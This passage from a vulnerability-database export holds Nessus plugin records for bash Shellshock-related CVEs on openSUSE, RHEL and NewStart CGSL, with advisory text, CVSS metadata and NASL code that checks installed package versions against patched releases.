'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and it is less serious due\nto the special, non-default system configuration that is needed to\ncreate an exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with BASH_FUNC_\n. This hardening feature is work in progress and might be improved in\nlater updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"https://lists.opensuse.org/opensuse-updates/2014-09/msg00039.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Qmail SMTP Bash Environment Variable Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debuginfo-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-debugsource-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-devel-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-lang-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"bash-loadables-debuginfo-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"libreadline6-debuginfo-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"readline-devel-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-61.15.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-61.15.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:44", "description": "[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-11-08T00:00:00", "type": "nessus", "title": "RHEL 4 / 5 / 6 : bash (RHSA-2014:1311)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/o:redhat:enterprise_linux:4", "cpe:/o:redhat:enterprise_linux:6.4", "cpe:/o:redhat:enterprise_linux:6.2", "cpe:/o:redhat:enterprise_linux:6", "cpe:/o:redhat:enterprise_linux:5.6", "cpe:/o:redhat:enterprise_linux:5.9", "p-cpe:/a:redhat:enterprise_linux:bash", "p-cpe:/a:redhat:enterprise_linux:bash-debuginfo", "p-cpe:/a:redhat:enterprise_linux:bash-doc"], "id": "REDHAT-RHSA-2014-1311.NASL", "href": "https://www.tenable.com/plugins/nessus/79052", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2014:1311. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79052);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1311\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"RHEL 4 / 5 / 6 : bash (RHSA-2014:1311)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 4 Extended Life Cycle Support, Red Hat\nEnterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended\nUpdate Support, Red Hat Enterprise Linux 6.2 Advanced Update Support,\nand Red Hat Enterprise Linux 6.4 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/articles/1200223\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2014:1311\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7186\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2014-7187\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash, bash-debuginfo and / or bash-doc packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/08\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(4|5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 4.x / 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2014:1311\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL4\", cpu:\"i386\", reference:\"bash-3.0-27.el4.4\")) flag++;\n\n if (rpm_check(release:\"RHEL4\", cpu:\"x86_64\", reference:\"bash-3.0-27.el4.4\")) flag++;\n\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"bash-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"bash-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"bash-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-24.el5_6.2\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"bash-debuginfo-3.2-32.el5_9.3\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++;\n\nif (sp == \"2\") { if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-4.1.2-9.el6_2.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-4.1.2-15.el6_4.2\")) flag++; }\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++;\n\nif (sp == \"2\") { if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-9.el6_2.2\")) flag++; }\n else { if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"bash-debuginfo-4.1.2-15.el6_4.2\")) flag++; }\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-15.el6_4.2\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"bash-doc-4.1.2-9.el6_2.2\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-debuginfo / bash-doc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T15:34:45", "description": "The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple vulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in the values of environment variables, which allows remote attackers to write to files or possibly have unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted SHELLOPTS and PS4 environment variables. (CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2021-10-27T00:00:00", "type": "nessus", "title": "NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2016-0634", "CVE-2016-7543"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:zte:cgsl_main:bash", "p-cpe:/a:zte:cgsl_main:bash-debuginfo", "p-cpe:/a:zte:cgsl_main:bash-debugsource", "p-cpe:/a:zte:cgsl_main:bash-devel", "p-cpe:/a:zte:cgsl_main:bash-doc", "cpe:/o:zte:cgsl_main:6"], "id": "NEWSTART_CGSL_NS-SA-2021-0118_BASH.NASL", "href": "https://www.tenable.com/plugins/nessus/154582", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from ZTE advisory NS-SA-2021-0118. The text\n# itself is copyright (C) ZTE, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(154582);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2016-0634\", \"CVE-2016-7543\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"NewStart CGSL MAIN 6.02 : bash Multiple Vulnerabilities (NS-SA-2021-0118)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote NewStart CGSL host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote NewStart CGSL host, running version MAIN 6.02, has bash packages installed that are affected by multiple\nvulnerabilities:\n\n - GNU Bash through 4.3 bash43-025 processes trailing strings after certain malformed function definitions in\n the values of environment variables, which allows remote attackers to write to files or possibly have\n unknown other impact via a crafted environment, as demonstrated by vectors involving the ForceCommand\n feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by\n unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege\n boundary from Bash execution. NOTE: this vulnerability exists because of an incomplete fix for\n CVE-2014-6271. (CVE-2014-7169)\n\n - The expansion of '\\h' in the prompt string in bash 4.3 allows remote authenticated users to execute\n arbitrary code via shell metacharacters placed in 'hostname' of a machine. (CVE-2016-0634)\n\n - Bash before 4.4 allows local users to execute arbitrary commands with root privileges via crafted\n SHELLOPTS and PS4 environment variables. (CVE-2016-7543)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/notice/NS-SA-2021-0118\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-0634\");\n script_set_attribute(attribute:\"see_also\", value:\"http://security.gd-linux.com/info/CVE-2016-7543\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the vulnerable CGSL bash packages. Note that updated packages may not be available yet. Please contact ZTE for\nmore information.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2016-7543\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:zte:cgsl_main:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:zte:cgsl_main:6\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"NewStart CGSL Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/ZTE-CGSL/release\", \"Host/ZTE-CGSL/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nvar release = get_kb_item('Host/ZTE-CGSL/release');\nif (isnull(release) || release !~ \"^CGSL (MAIN|CORE)\") audit(AUDIT_OS_NOT, 'NewStart Carrier Grade Server Linux');\n\nif (release !~ \"CGSL MAIN 6.02\")\n audit(AUDIT_OS_NOT, 'NewStart CGSL MAIN 6.02');\n\nif (!get_kb_item('Host/ZTE-CGSL/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'NewStart Carrier Grade Server Linux', cpu);\n\nvar flag = 0;\n\nvar pkgs = {\n 'CGSL MAIN 6.02': [\n 'bash-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debuginfo-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-debugsource-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-devel-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97',\n 'bash-doc-4.4.19-10.el8.cgslv6_2.0.1.g98f2d97'\n ]\n};\nvar pkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:'ZTE ' + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'bash');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:21:58", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances. (CVE-2014-7169)\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_. This hardening feature is work in progress and might be improved in later updates.\n\nAdditionally, two other security issues have been fixed :\n\n - Nested HERE documents could lead to a crash of bash.\n (CVE-2014-7186)\n\n - Nesting of for loops could lead to a crash of bash.\n (CVE-2014-7187)", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "SuSE 11.3 Security Update : bash (SAT Patch Number 9780)", 